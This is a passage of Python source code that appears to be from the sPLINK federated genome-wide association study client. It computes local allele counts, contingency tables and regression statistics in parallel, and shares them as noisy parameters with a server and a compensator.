# ########## log functions
def log_project_info(self):
""" OVERRIDDEN: log sPLINK project general info """
super().log_project_info()
# sPLINK-specific parameters
dataset_file = self.dataset_file_path.split("/")[-1][:-4]
self.log(f"Dataset file: {dataset_file}", include_date=False)
if self.phenotype_file_path:
phenotype_file = self.phenotype_file_path.split("/")[-1]
self.log(f'Phenotype file: {phenotype_file}', include_date=False)
else:
self.log(f'Phenotype file: -', include_date=False)
if self.covariate_file_path:
covariates_file = self.covariate_file_path.split("/")[-1]
self.log(f'Covariates file: {covariates_file}', include_date=False)
covariate_names = ','.join(self.covariate_names)
self.log(f'Covariate names: {covariate_names}', include_date=False)
else:
self.log(f'Covariates file: -', include_date=False)
self.log(f'CPU cores: {self.cpu_cores}', include_date=False)
self.log("\n", include_date=False)
# ########## Splink step functions
def init_step(self):
""" Initialize the GWAS dataset """
try:
# ##### open GWAS dataset
gwas_dataset = GwasDataset(bed_file_path=self.dataset_file_path,
phenotype_file_path=self.phenotype_file_path,
covariate_file_path=self.covariate_file_path,
phenotype_name=self.phenotype_name,
covariate_names=self.covariate_names)
self.log("Opening and pre-processing the GWAS dataset ...")
gwas_dataset.open_and_preprocess()
if gwas_dataset.is_operation_failed():
self.log(gwas_dataset.get_error_message())
self.set_operation_status_failed()
return
# phenotypes should be binary for logistic regression and chi-square
if not gwas_dataset.is_phenotype_binary() and (self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION or
self.algorithm == SplinkAlgorithm.CHI_SQUARE):
self.log(f"Phenotype values must be binary for {self.algorithm} tests!")
self.set_operation_status_failed()
return
# phenotype values should be quantitative for linear regression
if gwas_dataset.is_phenotype_binary() and self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION:
self.log(f"Phenotype values must be quantitative for {self.algorithm} tests!")
self.set_operation_status_failed()
return
# log general info about the gwas dataset
self.log(gwas_dataset.get_dataset_info(), include_date=False)
# #### initialize attributes required to compute local parameters
# initialize fam file related attributes
self.sex_values = gwas_dataset.get_sex_values()
self.phenotype_values = gwas_dataset.get_phenotype_values()
self.sample_count = gwas_dataset.get_sample_count()
# initialize bim file related attributes
self.snp_id_values = gwas_dataset.get_snp_id_values()
self.first_allele_names = gwas_dataset.get_first_allele_names()
self.second_allele_names = gwas_dataset.get_second_allele_names()
# initialize bed file related attribute
self.snp_values = gwas_dataset.get_snp_values()
# initialize covariate file related attributes
self.covariate_values = gwas_dataset.get_covariate_values()
# initialize attributes to speed-up the creation of the feature matrix
self.non_missing_index_values = gwas_dataset.get_non_missing_index_values()
self.covariate_matrix = gwas_dataset.get_covariate_matrix()
except Exception as io_exception:
self.log(io_exception)
self.set_operation_status_failed()
def snp_id_step(self):
""" share SNP IDs with the server """
try:
# share the SNP IDs whose minor allele frequency is non-zero with the server
non_zero_snp_ids = np.array([snp_id for snp_id in self.snp_id_values if self.first_allele_names[snp_id] != '0'])
self.local_parameters[SplinkLocalParameter.SNP_ID] = non_zero_snp_ids
except Exception as snp_exception:
self.log(snp_exception)
self.set_operation_status_failed()
def allele_name_step(self):
""" Initialize SNP (ID) values and first/second allele names based on global (common) SNP IDs first,
and then, share allele names with the server """
try:
# update snp_id_values, snp_values, first/second allele names
# based on the global SNP IDs by excluding those that do not exist in the other clients
# The above-mentioned attributed are converted to list
# update SNP IDs
self.snp_id_values = self.global_parameters[SplinkGlobalParameter.SNP_ID]
self.log(f"{len(self.snp_id_values)} SNPs are common among all clients")
# update SNP values
snp_values = list()
for snp_id in self.snp_id_values:
snp_values.append(self.snp_values[snp_id])
self.snp_values = snp_values
# update first/second allele names and initialize allele names (shared with server)
first_allele_names = list()
second_allele_names = list()
allele_names = [[], []]
for snp_id in self.snp_id_values:
first_allele_names.append(self.first_allele_names[snp_id])
second_allele_names.append(self.second_allele_names[snp_id])
# sort allele names to prevent revealing which allele is minor or major to the server
if self.first_allele_names[snp_id] < self.second_allele_names[snp_id]:
allele_names[0].append(self.first_allele_names[snp_id])
allele_names[1].append(self.second_allele_names[snp_id])
else:
allele_names[0].append(self.second_allele_names[snp_id])
allele_names[1].append(self.first_allele_names[snp_id])
self.first_allele_names = first_allele_names
self.second_allele_names = second_allele_names
# share allele names with the server
self.local_parameters[SplinkLocalParameter.ALLELE_NAME] = allele_names
except Exception as allele_name_exception:
self.log(allele_name_exception)
self.set_operation_status_failed()
def sample_count_step(self):
""" share noisy local sample count with the server and noise with compensator """
try:
self.local_parameters[SplinkLocalParameter.SAMPLE_COUNT] = self.sample_count
self.set_compensator_flag({SplinkLocalParameter.SAMPLE_COUNT: DataType.NON_NEGATIVE_INTEGER})
except Exception as sample_count_exception:
self.log(sample_count_exception)
self.set_operation_status_failed()
# ##### non_missing_count step related function
def non_missing_count_step(self):
""" init chunk attributes and compute local non-missing sample/allele count for the chunk """
try:
# init chunk attributes
self.current_chunk = self.global_parameters[SplinkGlobalParameter.CURRENT_CHUNK]
self.total_chunks = self.global_parameters[SplinkGlobalParameter.TOTAL_CHUNKS]
self.snp_indices = self.global_parameters[SplinkGlobalParameter.SNP_INDEX] # SNP indices in the current chunk
self.current_chunk_size = len(self.snp_indices)
chunk_start_index = self.global_parameters[SplinkGlobalParameter.CHUNK_START_INDEX]
chunk_end_index = self.global_parameters[SplinkGlobalParameter.CHUNK_END_INDEX]
self.set_sub_chunk_indices(chunk_start_index, chunk_end_index)
# init count dictionaries
self.non_missing_sample_counts = dict()
self.allele_counts = dict()
# queues
queue_non_missing = multiprocessing.Queue()
queue_allele_counts = multiprocessing.Queue()
# threads to read from the queues
thread_read_non_missing_queue = threading.Thread(target=self.read_queue_non_missing, args=(queue_non_missing,))
thread_read_non_missing_queue.daemon = True
thread_read_non_missing_queue.start()
thread_read_allele_counts_queue = threading.Thread(target=self.read_queue_allele_counts, args=(queue_allele_counts,))
thread_read_allele_counts_queue.daemon = True
thread_read_allele_counts_queue.start()
# start processes to compute the local non-missing sample counts as well as first/second allele counts for sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices, self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_non_missing_counts,
args=(start_index_sub_chunk, end_index_sub_chunk,
queue_non_missing, queue_allele_counts,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read threads to be done
thread_read_non_missing_queue.join()
thread_read_allele_counts_queue.join()
# close queues
queue_non_missing.close()
queue_allele_counts.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionaries to lists;
# IMPORTANT: sorted(self.snp_indices) should always be used to ensure the order between list and set related SNP indices
non_missing_sample_counts = list()
allele_counts = list()
for snp_index in sorted(self.snp_indices):
non_missing_sample_counts.append(self.non_missing_sample_counts[snp_index])
allele_counts.append(self.allele_counts[snp_index])
# python list of scalars must be converted to a numpy array if compensator flag is set
non_missing_sample_counts = np.array(non_missing_sample_counts)
# share the noisy counts with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.NON_MISSING_SAMPLE_COUNT] = non_missing_sample_counts
self.local_parameters[SplinkLocalParameter.ALLELE_COUNT] = allele_counts
self.set_compensator_flag({SplinkLocalParameter.NON_MISSING_SAMPLE_COUNT: DataType.NUMPY_ARRAY_NON_NEGATIVE_INTEGER,
SplinkLocalParameter.ALLELE_COUNT: DataType.LIST_NUMPY_ARRAY_NON_NEGATIVE_INTEGER})
except Exception as non_missing_count_exception:
self.log(non_missing_count_exception)
self.set_operation_status_failed()
def compute_non_missing_counts(self, start_index, end_index, queue_non_missing, queue_allele_counts):
""" Compute local non-missing sample count as well as first/second allele count for a sub-chunk """
# init dictionaries
non_missing_sample_counts = dict()
allele_counts = dict()
try:
for snp_index in np.arange(start_index, end_index):
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_non_missing.put(non_missing_sample_counts)
queue_allele_counts.put(allele_counts)
non_missing_sample_counts = dict()
allele_counts = dict()
# non-missing sample count
x_matrix, y_vector = self.get_x_matrix_y_vector(snp_index)
non_missing_sample_counts[snp_index] = y_vector.size
# allele count
snp_values = self.snp_values[snp_index]
first_allele_count = int(
2 * np.where(np.array(snp_values) == SnpValue.HOMOZYGOTE_00)[0].size +
np.where(np.array(snp_values) == SnpValue.HETEROZYGOTE)[0].size
)
second_allele_count = int(
2 * np.where(np.array(snp_values) == SnpValue.HOMOZYGOTE_11)[0].size +
np.where(np.array(snp_values) == SnpValue.HETEROZYGOTE)[0].size
)
# to stick with the correct mapping allele_name -> allele count, which is based on the sorted allele names in the server
if self.first_allele_names[snp_index] < self.second_allele_names[snp_index]:
allele_counts[snp_index] = np.array([first_allele_count, second_allele_count])
else:
allele_counts[snp_index] = np.array([second_allele_count, first_allele_count])
# put remaining results in the corresponding queues
queue_non_missing.put(non_missing_sample_counts)
queue_allele_counts.put(allele_counts)
except Exception as count_exception:
self.log(count_exception)
self.set_operation_status_failed()
# ##### minor_allele step related functions
def minor_allele_step(self):
""" Update the SNP values based on the global minor/major allele name """
try:
# get global minor allele names
global_minor_allele_names = self.global_parameters[SplinkGlobalParameter.MINOR_ALLELE_NAME]
global_major_allele_names = self.global_parameters[SplinkGlobalParameter.MAJOR_ALLELE_NAME]
for snp_index in global_minor_allele_names.keys():
# if local minor/major allele is different from the global minor/major allele
if self.second_allele_names[snp_index] != global_major_allele_names[snp_index]:
# swap the local minor and major allele names
self.first_allele_names[snp_index] = global_minor_allele_names[snp_index]
self.second_allele_names[snp_index] = global_major_allele_names[snp_index]
# inverse the mapping of the SNP values 0 -> 2 and 2 -> 0
self.snp_values[snp_index] = np.where(self.snp_values[snp_index] == 2, -3,
self.snp_values[snp_index])
self.snp_values[snp_index] = np.where(self.snp_values[snp_index] == 0, 2,
self.snp_values[snp_index])
self.snp_values[snp_index] = np.where(self.snp_values[snp_index] == -3, 0,
self.snp_values[snp_index])
except Exception as minor_allele_exception:
self.log(minor_allele_exception)
self.set_operation_status_failed()
# ##### contingency table step related functions
def contingency_table_step(self):
""" Compute local contingency table for the chunk"""
try:
# get SNP indices for which contingency table should be computed
self.snp_indices = self.global_parameters[SplinkGlobalParameter.SNP_INDEX]
self.current_chunk_size = len(self.snp_indices)
# init contingency tables
self.contingency_tables = dict()
# queue
queue_contingency_tables = multiprocessing.Queue()
# thread to read from the queues
thread_read_contingency_tables_queue = threading.Thread(target=self.read_queue_contingency_tables,
args=(queue_contingency_tables,))
thread_read_contingency_tables_queue.daemon = True
thread_read_contingency_tables_queue.start()
# processes to compute the local contingency tables for the sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices, self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_contingency_table,
args=(start_index_sub_chunk, end_index_sub_chunk,
queue_contingency_tables,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
thread_read_contingency_tables_queue.join()
# close queue
queue_contingency_tables.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionaries to lists;
contingency_tables = list()
for snp_index in sorted(self.snp_indices):
contingency_tables.append(self.contingency_tables[snp_index])
# share the noisy contingency tables with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.CONTINGENCY_TABLE] = contingency_tables
self.set_compensator_flag({SplinkLocalParameter.CONTINGENCY_TABLE: DataType.LIST_NUMPY_ARRAY_NON_NEGATIVE_INTEGER})
except Exception as contingency_table_exception:
self.log(contingency_table_exception)
self.set_operation_status_failed()
# compute contingency table for a set of SNPs
def compute_contingency_table(self, start_snp_index, end_snp_index, contingency_table_queue):
""" Compute local contingency table for a sub-chunk """
contingency_tables = dict()
for snp_index in np.arange(start_snp_index, end_snp_index):
if snp_index not in self.snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
contingency_table_queue.put(contingency_tables)
contingency_tables = dict()
minor_allele = self.first_allele_names[snp_index]
major_allele = self.second_allele_names[snp_index]
# minor-case
minor_case_count = self.compute_allele_count(snp_index, minor_allele, PhenotypeValue.CASE)
# major-case
major_case_count = self.compute_allele_count(snp_index, major_allele, PhenotypeValue.CASE)
# minor-control
minor_control_count = self.compute_allele_count(snp_index, minor_allele, PhenotypeValue.CONTROL)
# major-control
major_control_count = self.compute_allele_count(snp_index, major_allele, PhenotypeValue.CONTROL)
# contingency table value: [minor-case, major-case, minor-control, major-control]
contingency_tables[snp_index] = np.array([minor_case_count,
major_case_count,
minor_control_count,
major_control_count])
# put the remaining contingency tables into queue
contingency_table_queue.put(contingency_tables)
# ##### functions related to the beta step of the linear regression
def beta_linear_step(self):
""" Compute X'X and X'Y matrices for the chunk """
try:
# set dictionaries to empty at the beginning of the chunk
self.xt_x_matrix = dict()
self.xt_y_vector = dict()
# queues
queue_xt_x_matrix = multiprocessing.Queue()
queue_xt_y_vector = multiprocessing.Queue()
# get SNP indices for which X'X and X'Y should be computed
self.snp_indices = self.global_parameters[SplinkGlobalParameter.SNP_INDEX]
self.current_chunk_size = len(self.snp_indices)
# threads to read from the queues
xt_x_matrix_read_thread = threading.Thread(target=self.read_queue_xt_x_matrix,
args=(queue_xt_x_matrix,))
xt_x_matrix_read_thread.daemon = True
xt_x_matrix_read_thread.start()
xt_y_vector_read_thread = threading.Thread(target=self.read_queue_xt_y_vector,
args=(queue_xt_y_vector, ))
xt_y_vector_read_thread.daemon = True
xt_y_vector_read_thread.start()
# processes to compute local X'X and X'Y for the sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices, self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_beta_linear_parameters,
args=(start_index_sub_chunk, end_index_sub_chunk,
queue_xt_x_matrix, queue_xt_y_vector))
process_list.append(process)
process.daemon = True
process.start()
# wait for read threads to be done
xt_x_matrix_read_thread.join()
xt_y_vector_read_thread.join()
# close queues
queue_xt_x_matrix.close()
queue_xt_y_vector.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionaries to lists;
xt_x_matrix = list()
xt_y_vector = list()
for snp_index in sorted(self.snp_indices):
xt_x_matrix.append(self.xt_x_matrix[snp_index])
xt_y_vector.append(self.xt_y_vector[snp_index])
# share noisy local X'X matrix and X'Y vector with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.XT_X_MATRIX] = xt_x_matrix
self.local_parameters[SplinkLocalParameter.XT_Y_VECTOR] = xt_y_vector
self.set_compensator_flag({SplinkLocalParameter.XT_X_MATRIX: DataType.LIST_NUMPY_ARRAY_FLOAT,
SplinkLocalParameter.XT_Y_VECTOR: DataType.LIST_NUMPY_ARRAY_FLOAT})
except Exception as beta_linear_exception:
self.log(beta_linear_exception)
self.set_operation_status_failed()
def compute_beta_linear_parameters(self, start_index, end_index, queue_xt_x_matrix, queue_xt_y_vector):
""" Compute local X'X and X'Y for a sub-chunk """
xt_x_matrices = dict()
xt_y_vectors = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_xt_x_matrix.put(xt_x_matrices)
queue_xt_y_vector.put(xt_y_vectors)
xt_x_matrices = dict()
xt_y_vectors = dict()
x_matrix, y_vector = self.get_x_matrix_y_vector(snp_index)
xt_x_matrices[snp_index] = np.dot(x_matrix.T, x_matrix)
xt_y_vectors[snp_index] = np.dot(x_matrix.T, y_vector)
queue_xt_x_matrix.put(xt_x_matrices)
queue_xt_y_vector.put(xt_y_vectors)
# ##### functions related to the std error step of the linear regression algorithm
def std_error_linear_step(self):
""" Compute local sum square error values for the chunk """
try:
# set sse_values dictionary to empty at the beginning of the chunk
self.sse_values = dict()
# queue
queue_sse = multiprocessing.Queue()
# thread to read from the queues
sse_read_thread = threading.Thread(target=self.read_queue_sse, args=(queue_sse,))
sse_read_thread.daemon = True
sse_read_thread.start()
# global beta values
beta_values = self.global_parameters[SplinkGlobalParameter.BETA]
self.current_chunk_size = len(beta_values)
# processes to compute the local SSE values for the sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices, self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_sse_values,
args=(start_index_sub_chunk, end_index_sub_chunk,
beta_values, queue_sse))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
sse_read_thread.join()
# close queue
queue_sse.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionary to list
sse_values = list()
for snp_index in sorted(beta_values.keys()):
sse_values.append(self.sse_values[snp_index])
# python list of scalar values must be converted to a numpy array if compensator flag is set
sse_values = np.array(sse_values)
# share noisy local sse values with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.SSE] = sse_values
self.set_compensator_flag({SplinkLocalParameter.SSE: DataType.NUMPY_ARRAY_FLOAT})
except Exception as std_error_linear_exception:
self.log(std_error_linear_exception)
self.set_operation_status_failed()
def compute_sse_values(self, start_index, end_index, beta_values, queue_sse):
""" Compute local sum square error value for a sub-chunk """
sse_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in beta_values.keys():
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_sse.put(sse_values)
sse_values = dict()
# compute sum square error value for the SNP
x_matrix, y_vector = self.get_x_matrix_y_vector(snp_index)
beta_vector = beta_values[snp_index].reshape(-1, 1)
y_predicted = np.dot(x_matrix, beta_vector)
sse_values[snp_index] = np.sum(np.square(y_vector - y_predicted))
queue_sse.put(sse_values)
# ##### logistic regression beta step related functions
def beta_logistic_step(self):
""" Compute local gradient and Hessian matrices as well as log likelihood values for the chunk """
try:
# set gradient, Hessian, and log likelihood dictionaries to empty at the beginning of the chunk
self.gradient_vectors = dict()
self.hessian_matrices = dict()
self.log_likelihood_values = dict()
# queues
queue_gradient = multiprocessing.Queue()
queue_hessian = multiprocessing.Queue()
queue_log_likelihood = multiprocessing.Queue()
# thread to read from the queues
gradient_read_thread = threading.Thread(target=self.read_queue_gradient, args=(queue_gradient,))
gradient_read_thread.daemon = True
gradient_read_thread.start()
hessian_read_thread = threading.Thread(target=self.read_queue_hessian, args=(queue_hessian,))
hessian_read_thread.daemon = True
hessian_read_thread.start()
log_likelihood_read_thread = threading.Thread(target=self.read_queue_log_likelihood, args=(queue_log_likelihood,))
log_likelihood_read_thread.daemon = True
log_likelihood_read_thread.start()
# global beta values and current beta iteration
beta_values = self.global_parameters[SplinkGlobalParameter.BETA]
self.current_chunk_size = len(beta_values)
self.current_beta_iteration = self.global_parameters[SplinkGlobalParameter.CURRENT_BETA_ITERATION]
# processes to compute the gradient, Hessian, and log likelihood values for sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices,
self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_beta_logistic_parameters,
args=(start_index_sub_chunk, end_index_sub_chunk,
beta_values, queue_gradient, queue_hessian, queue_log_likelihood))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
gradient_read_thread.join()
hessian_read_thread.join()
log_likelihood_read_thread.join()
# close queues
queue_gradient.close()
queue_hessian.close()
queue_log_likelihood.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionary to list
gradient_vectors = list()
hessian_matrices = list()
log_likelihood_values = list()
for snp_index in sorted(beta_values.keys()):
gradient_vectors.append(self.gradient_vectors[snp_index])
hessian_matrices.append(self.hessian_matrices[snp_index])
log_likelihood_values.append(self.log_likelihood_values[snp_index])
# python list of scalars must be converted to a numpy array if compensator flag is set
log_likelihood_values = np.array(log_likelihood_values)
# share the noisy local gradient, Hessian, and log likelihood values with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.GRADIENT] = gradient_vectors
self.local_parameters[SplinkLocalParameter.HESSIAN] = hessian_matrices
self.local_parameters[SplinkLocalParameter.LOG_LIKELIHOOD] = log_likelihood_values
self.set_compensator_flag({SplinkLocalParameter.GRADIENT: DataType.LIST_NUMPY_ARRAY_FLOAT,
SplinkLocalParameter.HESSIAN: DataType.LIST_NUMPY_ARRAY_FLOAT,
SplinkLocalParameter.LOG_LIKELIHOOD: DataType.NUMPY_ARRAY_FLOAT})
except Exception as beta_logistic_exception:
self.log(beta_logistic_exception)
self.set_operation_status_failed()
def compute_beta_logistic_parameters(self, start_index, end_index, beta_values, queue_gradient, queue_hessian, queue_log_likelihood):
""" Compute local gradient vector, Hessian matrix, and log likelihood values for a sub-chunk """
epsilon = np.finfo(float).eps # to avoid log(0)
gradient_vectors = dict()
hessian_matrices = dict()
log_likelihood_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in beta_values.keys():
continue
# put results in the queues whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_gradient.put(gradient_vectors)
queue_hessian.put(hessian_matrices)
queue_log_likelihood.put(log_likelihood_values)
gradient_vectors = dict()
hessian_matrices = dict()
log_likelihood_values = dict()
x_matrix, y_vector = self.get_x_matrix_y_vector(snp_index)
beta_vector = beta_values[snp_index].reshape(-1, 1)
# gradient
x_beta_product = np.dot(x_matrix, beta_vector)
y_predicted = 1 / (1 + np.exp(-x_beta_product))
gradient_vectors[snp_index] = np.dot(x_matrix.T, (y_vector - y_predicted))
# hessian matrix
hessian_matrices[snp_index] = np.dot(np.multiply(x_matrix.T, (y_predicted * (1 - y_predicted)).T), x_matrix)
# log likelihood
log_likelihood_values[snp_index] = np.sum(
y_vector * np.log(y_predicted + epsilon) + (1 - y_vector) * np.log(1 - y_predicted + epsilon))
queue_gradient.put(gradient_vectors)
queue_hessian.put(hessian_matrices)
queue_log_likelihood.put(log_likelihood_values)
# ##### std error step related functions for logistic regression algorithm
def std_error_logistic_step(self):
""" Compute local hessian matrices for the chunk """
try:
# set Hessian dictionary to empty at the beginning of the chunk
self.hessian_matrices = dict()
# queue
queue_hessian = multiprocessing.Queue()
# thread to read from the queue
hessian_read_thread = threading.Thread(target=self.read_queue_hessian, args=(queue_hessian,))
hessian_read_thread.daemon = True
hessian_read_thread.start()
# global beta values
beta_values = self.global_parameters[SplinkGlobalParameter.BETA]
self.current_chunk_size = len(beta_values)
# processes to compute the local Hessian matrices for the sub-chunks
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(self.sub_chunk_start_indices,
self.sub_chunk_end_indices):
process = multiprocessing.Process(target=self.compute_hessian_matrices,
args=(start_index_sub_chunk, end_index_sub_chunk, beta_values, queue_hessian,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
hessian_read_thread.join()
# close queues
queue_hessian.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# convert dictionary to list
hessian_matrices = list()
for snp_index in sorted(beta_values.keys()):
hessian_matrices.append(self.hessian_matrices[snp_index])
# share noisy local Hessian matrices with the server and noise with compensator
self.local_parameters[SplinkLocalParameter.HESSIAN] = hessian_matrices
self.set_compensator_flag({SplinkLocalParameter.HESSIAN: DataType.LIST_NUMPY_ARRAY_FLOAT})
except Exception as std_error_logistic_exception:
self.log(std_error_logistic_exception)
self.set_operation_status_failed()
def compute_hessian_matrices(self, start_index, end_index, beta_values, queue_hessian):
""" Compute local Hessian matrices for a sub-chunk """
hessian_matrices = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in beta_values.keys():
continue
# put results in the queues whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_hessian.put(hessian_matrices)
hessian_matrices = dict()
# Hessian matrix
x_matrix, y_vector = self.get_x_matrix_y_vector(snp_index)
beta_vector = beta_values[snp_index].reshape(-1, 1)
x_beta_product = np.dot(x_matrix, beta_vector)
y_predicted = 1 / (1 + np.exp(-x_beta_product))
hessian_matrices[snp_index] = np.dot(np.multiply(x_matrix.T, (y_predicted * (1 - y_predicted)).T), x_matrix)
queue_hessian.put(hessian_matrices)
# ##### Queue functions
def read_queue_non_missing(self, queue_non_missing):
while len(self.non_missing_sample_counts) < self.current_chunk_size:
sample_count_non_missing = queue_non_missing.get()
self.non_missing_sample_counts.update(sample_count_non_missing)
def read_queue_allele_counts(self, queue_allele_counts):
while len(self.allele_counts) < self.current_chunk_size:
count_alleles = queue_allele_counts.get()
self.allele_counts.update(count_alleles)
def read_queue_contingency_tables(self, queue_contingency_tables):
while len(self.contingency_tables) < self.current_chunk_size:
cont_table = queue_contingency_tables.get()
self.contingency_tables.update(cont_table)
def read_queue_xt_x_matrix(self, queue_xt_x_matrix):
while len(self.xt_x_matrix) < self.current_chunk_size:
xt_x = queue_xt_x_matrix.get()
self.xt_x_matrix.update(xt_x)
def read_queue_xt_y_vector(self, queue_xt_y_vector):
while len(self.xt_y_vector) < self.current_chunk_size:
xt_y = queue_xt_y_vector.get()
self.xt_y_vector.update(xt_y)
def read_queue_sse(self, queue_sse):
while len(self.sse_values) < self.current_chunk_size:
sse = queue_sse.get()
self.sse_values.update(sse)
def read_queue_gradient(self, queue_gradient):
while len(self.gradient_vectors) < self.current_chunk_size:
gradient = queue_gradient.get()
self.gradient_vectors.update(gradient)
def read_queue_hessian(self, queue_hessian):
while len(self.hessian_matrices) < self.current_chunk_size:
hessian_matrix = queue_hessian.get()
self.hessian_matrices.update(hessian_matrix)
def read_queue_log_likelihood(self, queue_log_likelihood):
while len(self.log_likelihood_values) < self.current_chunk_size:
log_likelihood = queue_log_likelihood.get()
self.log_likelihood_values.update(log_likelihood)
# ##### multi-processing functions
def set_sub_chunk_indices(self, start_snp_index, end_snp_index):
""" Determine start/end indices for sub-chunks assigned to each process/core """
try:
if end_snp_index <= start_snp_index:
self.log("end_snp_index must be greater than start_snp_index!")
self.set_operation_status_failed()
return
# ensure each process/core will compute at least one SNP statistics
if self.current_chunk_size < self.cpu_cores:
cpu_cores = 1
else:
cpu_cores = self.cpu_cores
sub_chunk_size = int(np.ceil(self.current_chunk_size / cpu_cores))
start_indices = np.arange(start_snp_index, end_snp_index, sub_chunk_size)
end_indices = start_indices + sub_chunk_size
end_indices[-1] = end_snp_index
self.sub_chunk_start_indices = start_indices
self.sub_chunk_end_indices = end_indices
except Exception as sub_chunk_exception:
self.log(sub_chunk_exception)
self.set_operation_status_failed()
# ##### Helper functions
def get_x_matrix_y_vector(self, snp_index):
""" Create feature matrix and label vector """
try:
# get non-missing rows after considering SNP values
snp_indices_non_missing = self.snp_values[snp_index] != MissingValue.SNP
index_values_non_missing = np.logical_and(self.non_missing_index_values, snp_indices_non_missing)
# create feature matrix
snp_vector = self.snp_values[snp_index][index_values_non_missing].reshape(-1, 1).astype(np.int64)
if len(self.covariate_names) == 0:
x_matrix = np.concatenate((np.ones((len(snp_vector), 1)).astype(np.int64), snp_vector), axis=1)
else:
x_matrix = np.concatenate((np.ones((len(snp_vector), 1)).astype(np.int64),
snp_vector, self.covariate_matrix[index_values_non_missing, :]), axis=1)
# create label vector
y_vector = self.phenotype_values[index_values_non_missing].reshape(-1, 1)
if self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION or self.algorithm == SplinkAlgorithm.CHI_SQUARE:
y_vector = y_vector.astype(np.uint8)
return x_matrix, y_vector
except Exception as x_y_exception:
self.log(f'{x_y_exception}')
self.set_operation_status_failed()
def compute_allele_count(self, snp_index, allele_name, trait):
""" Compute allele count for minor-case, minor-control, major-case, and major-control """
try:
x_matrix, phenotype_values = self.get_x_matrix_y_vector(snp_index)
snp_values = x_matrix[:, 1]
trait_indices = np.where(phenotype_values == trait)[0]
trait_snp_values = snp_values[trait_indices]
if allele_name == self.first_allele_names[snp_index]:
return int(2 * np.where(trait_snp_values == SnpValue.HOMOZYGOTE_00)[0].size +
np.where(trait_snp_values == SnpValue.HETEROZYGOTE)[0].size)
if allele_name == self.second_allele_names[snp_index]:
return int(2 * np.where(trait_snp_values == SnpValue.HOMOZYGOTE_11)[0].size +
np.where(trait_snp_values == SnpValue.HETEROZYGOTE)[0].size)
except Exception as allele_count_exception:
self.log(allele_count_exception)
self.set_operation_status_failed()
# ##### Project progress/status widget related functions
def get_project_step_text(self):
""" Customize the label shown for project step in the status widget """
if self.operation_status == ClientOperation.WAITING_FOR_START:
return '-'
if self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION and self.project_step == SplinkProjectStep.BETA_LOGISTIC:
return f'Beta ({self.current_beta_iteration}/{self.max_iterations})'
if self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION and self.project_step == SplinkProjectStep.BETA_LINEAR:
return 'Beta'
if self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION and self.project_step == SplinkProjectStep.STD_ERROR_LOGISTIC:
return 'STD-Error'
if self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION and self.project_step == SplinkProjectStep.STD_ERROR_LINEAR:
return 'STD-Error'
return self.project_step
def get_chunk_text(self):
""" Customize label shown for chunk in the status widget """
if self.total_chunks == -1:
return '-'
return f'{self.current_chunk}/{self.total_chunks}'
# ##### Local parameter value computation
def compute_local_parameters(self):
""" OVERRIDDEN: Compute the local parameters in each step of the sPLINK algorithms """
try:
super().pre_compute_local_parameters() # MUST be called BEFORE step functions
# sPLINK specific local parameter computation steps
if self.project_step == HyFedProjectStep.INIT:
self.init_step()
elif self.project_step == SplinkProjectStep.SNP_ID:
self.snp_id_step()
elif self.project_step == SplinkProjectStep.ALLELE_NAME:
self.allele_name_step()
elif self.project_step == SplinkProjectStep.SAMPLE_COUNT:
self.sample_count_step()
elif self.project_step == SplinkProjectStep.NON_MISSING_COUNT:
self.non_missing_count_step()
elif self.project_step == SplinkProjectStep.MINOR_ALLELE:
self.minor_allele_step()
elif self.project_step == SplinkProjectStep.CONTINGENCY_TABLE:
self.contingency_table_step()
elif self.project_step == SplinkProjectStep.BETA_LINEAR:
self.beta_linear_step()
elif self.project_step == SplinkProjectStep.BETA_LOGISTIC:
self.beta_logistic_step()
elif self.project_step == SplinkProjectStep.STD_ERROR_LINEAR:
